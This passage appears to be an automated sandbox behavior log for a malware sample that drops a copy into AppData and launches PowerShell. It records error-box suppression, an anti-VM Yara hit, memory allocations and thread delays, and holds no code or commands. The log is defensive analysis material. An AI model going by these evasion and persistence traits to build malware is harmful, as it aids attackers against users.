Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\WIpGif4IRrFfamQ.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\WIpGif4IRrFfamQ.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\WIpGif4IRrFfamQ.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\WIpGif4IRrFfamQ.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\WIpGif4IRrFfamQ.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\WIpGif4IRrFfamQ.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\WIpGif4IRrFfamQ.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\WIpGif4IRrFfamQ.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\WIpGif4IRrFfamQ.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\WIpGif4IRrFfamQ.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\WIpGif4IRrFfamQ.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\WIpGif4IRrFfamQ.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\WIpGif4IRrFfamQ.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\WIpGif4IRrFfamQ.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\WIpGif4IRrFfamQ.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\WIpGif4IRrFfamQ.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\WIpGif4IRrFfamQ.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\WIpGif4IRrFfamQ.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\WIpGif4IRrFfamQ.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\WIpGif4IRrFfamQ.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\WIpGif4IRrFfamQ.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\WIpGif4IRrFfamQ.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\WIpGif4IRrFfamQ.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\WIpGif4IRrFfamQ.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\WIpGif4IRrFfamQ.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\WIpGif4IRrFfamQ.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\WIpGif4IRrFfamQ.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\WIpGif4IRrFfamQ.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\WIpGif4IRrFfamQ.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\WIpGif4IRrFfamQ.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\WIpGif4IRrFfamQ.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\WIpGif4IRrFfamQ.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\WIpGif4IRrFfamQ.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\WIpGif4IRrFfamQ.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\WIpGif4IRrFfamQ.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\WIpGif4IRrFfamQ.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\WIpGif4IRrFfamQ.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\WIpGif4IRrFfamQ.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\WIpGif4IRrFfamQ.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\WIpGif4IRrFfamQ.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\WIpGif4IRrFfamQ.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\WIpGif4IRrFfamQ.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\WIpGif4IRrFfamQ.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\WIpGif4IRrFfamQ.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\WIpGif4IRrFfamQ.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\WIpGif4IRrFfamQ.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\WIpGif4IRrFfamQ.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\WIpGif4IRrFfamQ.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\WIpGif4IRrFfamQ.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\WIpGif4IRrFfamQ.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\WIpGif4IRrFfamQ.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\WIpGif4IRrFfamQ.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\WIpGif4IRrFfamQ.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\WIpGif4IRrFfamQ.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\WIpGif4IRrFfamQ.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\WIpGif4IRrFfamQ.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\WIpGif4IRrFfamQ.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\WIpGif4IRrFfamQ.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\WIpGif4IRrFfamQ.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\AcEnrS.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\AcEnrS.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\AcEnrS.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\AcEnrS.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\AcEnrS.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\AcEnrS.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\AcEnrS.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\AcEnrS.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\AcEnrS.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\AcEnrS.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\AcEnrS.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\AcEnrS.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\AcEnrS.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\AcEnrS.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\AcEnrS.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\AcEnrS.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\AcEnrS.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\AcEnrS.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\AcEnrS.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\AcEnrS.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\AcEnrS.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\AcEnrS.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\AcEnrS.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\AcEnrS.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\AcEnrS.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\AcEnrS.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\AcEnrS.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\AcEnrS.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\AcEnrS.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\AcEnrS.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\AcEnrS.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\AcEnrS.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\AcEnrS.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\AcEnrS.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\AcEnrS.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\AcEnrS.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\AcEnrS.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\AcEnrS.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\AcEnrS.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\AcEnrS.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\AcEnrS.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\AcEnrS.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\AcEnrS.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\AcEnrS.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\AcEnrS.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\AcEnrS.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\AcEnrS.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\AcEnrS.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\AcEnrS.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\AcEnrS.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\AcEnrS.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\AcEnrS.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\AcEnrS.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\AcEnrS.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\AcEnrS.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\AcEnrS.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\AcEnrS.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\AcEnrS.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\AcEnrS.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\AcEnrS.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\AcEnrS.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\AcEnrS.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\AcEnrS.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\AcEnrS.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\AcEnrS.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\AcEnrS.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\AcEnrS.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\AcEnrS.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\AcEnrS.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\AcEnrS.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\AcEnrS.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\AcEnrS.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\AcEnrS.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\AcEnrS.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\AcEnrS.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\AcEnrS.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\AcEnrS.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\AcEnrS.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\AcEnrS.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\AcEnrS.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\AcEnrS.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\AcEnrS.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\AcEnrS.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\AcEnrS.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX

Malware Analysis System Evasion

Yara detected AntiVM3

Source: Yara match	File source: Process Memory Space: WIpGif4IRrFfamQ.exe PID: 6600, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: AcEnrS.exe PID: 7400, type: MEMORYSTR

Source: C:\Users\user\Desktop\WIpGif4IRrFfamQ.exe	Memory allocated: 2DB0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\WIpGif4IRrFfamQ.exe	Memory allocated: 3070000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\WIpGif4IRrFfamQ.exe	Memory allocated: 2DB0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\WIpGif4IRrFfamQ.exe	Memory allocated: 7C20000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\WIpGif4IRrFfamQ.exe	Memory allocated: 7580000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\WIpGif4IRrFfamQ.exe	Memory allocated: 8C20000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\WIpGif4IRrFfamQ.exe	Memory allocated: 9C20000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\WIpGif4IRrFfamQ.exe	Memory allocated: A2E0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\WIpGif4IRrFfamQ.exe	Memory allocated: B2E0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\WIpGif4IRrFfamQ.exe	Memory allocated: C2E0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\WIpGif4IRrFfamQ.exe	Memory allocated: 13F0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\WIpGif4IRrFfamQ.exe	Memory allocated: 2E10000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\WIpGif4IRrFfamQ.exe	Memory allocated: 2BD0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Roaming\AcEnrS.exe	Memory allocated: B10000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Roaming\AcEnrS.exe	Memory allocated: 2490000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Roaming\AcEnrS.exe	Memory allocated: 4490000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Roaming\AcEnrS.exe	Memory allocated: 6AE0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Roaming\AcEnrS.exe	Memory allocated: 7AE0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Roaming\AcEnrS.exe	Memory allocated: 7C70000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Roaming\AcEnrS.exe	Memory allocated: 8C70000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Roaming\AcEnrS.exe	Memory allocated: 9300000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Roaming\AcEnrS.exe	Memory allocated: A300000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Roaming\AcEnrS.exe	Memory allocated: B300000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Roaming\AcEnrS.exe	Memory allocated: F60000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Roaming\AcEnrS.exe	Memory allocated: 2A70000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Roaming\AcEnrS.exe	Memory allocated: 2870000 memory reserve \| memory write watch

Source: C:\Users\user\Desktop\WIpGif4IRrFfamQ.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\Desktop\WIpGif4IRrFfamQ.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\Desktop\WIpGif4IRrFfamQ.exe	Thread delayed: delay time: 600000	Jump to behavior
Source: C:\Users\user\Desktop\WIpGif4IRrFfamQ.exe	Thread delayed: delay time: 599796	Jump to behavior
Source: C:\Users\user\Desktop\WIpGif4IRrFfamQ.exe	Thread delayed: delay time: 599671	Jump to behavior
Source: C:\Users\user\Desktop\WIpGif4IRrFfamQ.exe	Thread delayed: delay time: 599563	Jump to behavior
Source: C:\Users\user\Desktop\WIpGif4IRrFfamQ.exe	Thread delayed: delay time: 599453	Jump to behavior
Source: C:\Users\user\Desktop\WIpGif4IRrFfamQ.exe	Thread delayed: delay time: 599344	Jump to behavior
Source: C:\Users\user\Desktop\WIpGif4IRrFfamQ.exe	Thread delayed: delay time: 599235	Jump to behavior
Source: C:\Users\user\Desktop\WIpGif4IRrFfamQ.exe	Thread delayed: delay time: 599110	Jump to behavior
Source: C:\Users\user\Desktop\WIpGif4IRrFfamQ.exe	Thread delayed: delay time: 598985	Jump to behavior
Source: C:\Users\user\Desktop\WIpGif4IRrFfamQ.exe	Thread delayed: delay time: 598860	Jump to behavior
Source: C:\Users\user\Desktop\WIpGif4IRrFfamQ.exe	Thread delayed: delay time: 598735	Jump to behavior
Source: C:\Users\user\Desktop\WIpGif4IRrFfamQ.exe	Thread delayed: delay time: 598610	Jump to behavior
Source: C:\Users\user\Desktop\WIpGif4IRrFfamQ.exe	Thread delayed: delay time: 598485	Jump to behavior
Source: C:\Users\user\Desktop\WIpGif4IRrFfamQ.exe	Thread delayed: delay time: 598360	Jump to behavior
Source: C:\Users\user\Desktop\WIpGif4IRrFfamQ.exe	Thread delayed: delay time: 598235	Jump to behavior
Source: C:\Users\user\Desktop\WIpGif4IRrFfamQ.exe	Thread delayed: delay time: 598110	Jump to behavior
Source: C:\Users\user\Desktop\WIpGif4IRrFfamQ.exe	Thread delayed: delay time: 597985	Jump to behavior
Source: C:\Users\user\Desktop\WIpGif4IRrFfamQ.exe	Thread delayed: delay time: 597860	Jump to behavior
Source: C:\Users\user\Desktop\WIpGif4IRrFfamQ.exe	Thread delayed: delay time: 597735	Jump to behavior
Source: C:\Users\user\Desktop\WIpGif4IRrFfamQ.exe	Thread delayed: delay time: 597610	Jump to behavior
Source: C:\Users\user\Desktop\WIpGif4IRrFfamQ.exe	Thread delayed: delay time: 597485	Jump to behavior
Source: C:\Users\user\Desktop\WIpGif4IRrFfamQ.exe	Thread delayed: delay time: 597360	Jump to behavior
Source: C:\Users\user\Desktop\WIpGif4IRrFfamQ.exe	Thread delayed: delay time: 597235	Jump to behavior
Source: C:\Users\user\Desktop\WIpGif4IRrFfamQ.exe	Thread delayed: delay time: 597110	Jump to behavior
Source: C:\Users\user\Desktop\WIpGif4IRrFfamQ.exe	Thread delayed: delay time: 596985	Jump to behavior
Source: C:\Users\user\Desktop\WIpGif4IRrFfamQ.exe	Thread delayed: delay time: 596860	Jump to behavior
Source: C:\Users\user\Desktop\WIpGif4IRrFfamQ.exe	Thread delayed: delay time: 596735	Jump to behavior
Source: C:\Users\user\Desktop\WIpGif4IRrFfamQ.exe	Thread delayed: delay time: 596610	Jump to behavior
Source: C:\Users\user\Desktop\WIpGif4IRrFfamQ.exe	Thread delayed: delay time: 596485	Jump to behavior
Source: C:\Users\user\Desktop\WIpGif4IRrFfamQ.exe	Thread delayed: delay time: 596360	Jump to behavior
Source: C:\Users\user\Desktop\WIpGif4IRrFfamQ.exe	Thread delayed: delay time: 596235	Jump to behavior
Source: C:\Users\user\Desktop\WIpGif4IRrFfamQ.exe	Thread delayed: delay time: 596110	Jump to behavior
Source: C:\Users\user\Desktop\WIpGif4IRrFfamQ.exe	Thread delayed: delay time: 595985	Jump to behavior
Source: C:\Users\user\Desktop\WIpGif4IRrFfamQ.exe	Thread delayed: delay time: 595860	Jump to behavior
Source: C:\Users\user\Desktop\WIpGif4IRrFfamQ.exe	Thread delayed: delay time: 595735	Jump to behavior
Source: C:\Users\user\Desktop\WIpGif4IRrFfamQ.exe	Thread delayed: delay time: 595610	Jump to behavior
Source: C:\Users\user\Desktop\WIpGif4IRrFfamQ.exe	Thread delayed: delay time: 595485	Jump to behavior
Source: C:\Users\user\Desktop\WIpGif4IRrFfamQ.exe	Thread delayed: delay time: 595360	Jump to behavior
Source: C:\Users\user\Desktop\WIpGif4IRrFfamQ.exe	Thread delayed: delay time: 595235	Jump to behavior
Source: C:\Users\user\Desktop\WIpGif4IRrFfamQ.exe	Thread delayed: delay time: 595110	Jump to behavior
Source: C:\Users\user\Desktop\WIpGif4IRrFfamQ.exe	Thread delayed: delay time: 594985	Jump to behavior
